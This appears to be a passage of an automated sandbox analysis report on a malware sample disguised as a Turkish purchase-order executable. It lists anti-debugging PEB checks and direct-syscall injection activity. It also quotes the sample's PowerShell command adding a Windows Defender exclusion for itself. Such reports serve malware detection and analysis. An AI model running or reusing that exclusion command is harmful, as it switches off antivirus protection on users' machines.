            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6259 mov eax, dword ptr fs:[00000030h]3_2_018F6259
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EA250 mov eax, dword ptr fs:[00000030h]3_2_018EA250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E826B mov eax, dword ptr fs:[00000030h]3_2_018E826B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F4260 mov eax, dword ptr fs:[00000030h]3_2_018F4260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F4260 mov eax, dword ptr fs:[00000030h]3_2_018F4260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F4260 mov eax, dword ptr fs:[00000030h]3_2_018F4260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F2582 mov eax, dword ptr fs:[00000030h]3_2_018F2582
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F2582 mov ecx, dword ptr fs:[00000030h]3_2_018F2582
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E59C mov eax, dword ptr fs:[00000030h]3_2_0192E59C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01924588 mov eax, dword ptr fs:[00000030h]3_2_01924588
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019145B1 mov eax, dword ptr fs:[00000030h]3_2_019145B1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019145B1 mov eax, dword ptr fs:[00000030h]3_2_019145B1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019705A7 mov eax, dword ptr fs:[00000030h]3_2_019705A7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019705A7 mov eax, dword ptr fs:[00000030h]3_2_019705A7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019705A7 mov eax, dword ptr fs:[00000030h]3_2_019705A7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A5D0 mov eax, dword ptr fs:[00000030h]3_2_0192A5D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A5D0 mov eax, dword ptr fs:[00000030h]3_2_0192A5D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E5CF mov eax, dword ptr fs:[00000030h]3_2_0192E5CF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E5CF mov eax, dword ptr fs:[00000030h]3_2_0192E5CF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F65D0 mov eax, dword ptr fs:[00000030h]3_2_018F65D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F25E0 mov eax, dword ptr fs:[00000030h]3_2_018F25E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192C5ED mov eax, dword ptr fs:[00000030h]3_2_0192C5ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192C5ED mov eax, dword ptr fs:[00000030h]3_2_0192C5ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01986500 mov eax, dword ptr fs:[00000030h]3_2_01986500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h]3_2_0191E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h]3_2_0191E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h]3_2_0191E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h]3_2_0191E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h]3_2_0191E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8550 mov eax, dword ptr fs:[00000030h]3_2_018F8550
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8550 mov eax, dword ptr fs:[00000030h]3_2_018F8550
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192656A mov eax, dword ptr fs:[00000030h]3_2_0192656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192656A mov eax, dword ptr fs:[00000030h]3_2_0192656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192656A mov eax, dword ptr fs:[00000030h]3_2_0192656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AA49A mov eax, dword ptr fs:[00000030h]3_2_019AA49A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019244B0 mov ecx, dword ptr fs:[00000030h]3_2_019244B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F64AB mov eax, dword ptr fs:[00000030h]3_2_018F64AB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197A4B0 mov eax, dword ptr fs:[00000030h]3_2_0197A4B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F04E5 mov ecx, dword ptr fs:[00000030h]3_2_018F04E5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01928402 mov eax, dword ptr fs:[00000030h]3_2_01928402
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01928402 mov eax, dword ptr fs:[00000030h]3_2_01928402
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01928402 mov eax, dword ptr fs:[00000030h]3_2_01928402
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EC427 mov eax, dword ptr fs:[00000030h]3_2_018EC427
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BAB40 mov eax, dword ptr fs:[00000030h]3_2_019BAB40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01998B42 mov eax, dword ptr fs:[00000030h]3_2_01998B42
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E8B50 mov eax, dword ptr fs:[00000030h]3_2_018E8B50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018ECB7E mov eax, dword ptr fs:[00000030h]3_2_018ECB7E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01928A90 mov edx, dword ptr fs:[00000030h]3_2_01928A90
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4A80 mov eax, dword ptr fs:[00000030h]3_2_019C4A80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8AA0 mov eax, dword ptr fs:[00000030h]3_2_018F8AA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8AA0 mov eax, dword ptr fs:[00000030h]3_2_018F8AA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01946AA4 mov eax, dword ptr fs:[00000030h]3_2_01946AA4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01924AD0 mov eax, dword ptr fs:[00000030h]3_2_01924AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01924AD0 mov eax, dword ptr fs:[00000030h]3_2_01924AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01946ACC mov eax, dword ptr fs:[00000030h]3_2_01946ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01946ACC mov eax, dword ptr fs:[00000030h]3_2_01946ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01946ACC mov eax, dword ptr fs:[00000030h]3_2_01946ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F0AD0 mov eax, dword ptr fs:[00000030h]3_2_018F0AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192AAEE mov eax, dword ptr fs:[00000030h]3_2_0192AAEE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192AAEE mov eax, dword ptr fs:[00000030h]3_2_0192AAEE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197CA11 mov eax, dword ptr fs:[00000030h]3_2_0197CA11
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01914A35 mov eax, dword ptr fs:[00000030h]3_2_01914A35
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01914A35 mov eax, dword ptr fs:[00000030h]3_2_01914A35
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192CA24 mov eax, dword ptr fs:[00000030h]3_2_0192CA24
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191EA2E mov eax, dword ptr fs:[00000030h]3_2_0191EA2E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900A5B mov eax, dword ptr fs:[00000030h]3_2_01900A5B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900A5B mov eax, dword ptr fs:[00000030h]3_2_01900A5B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h]3_2_018F6A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h]3_2_018F6A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h]3_2_018F6A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h]3_2_018F6A50
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtOpenKeyEx: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQueryValueKey: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
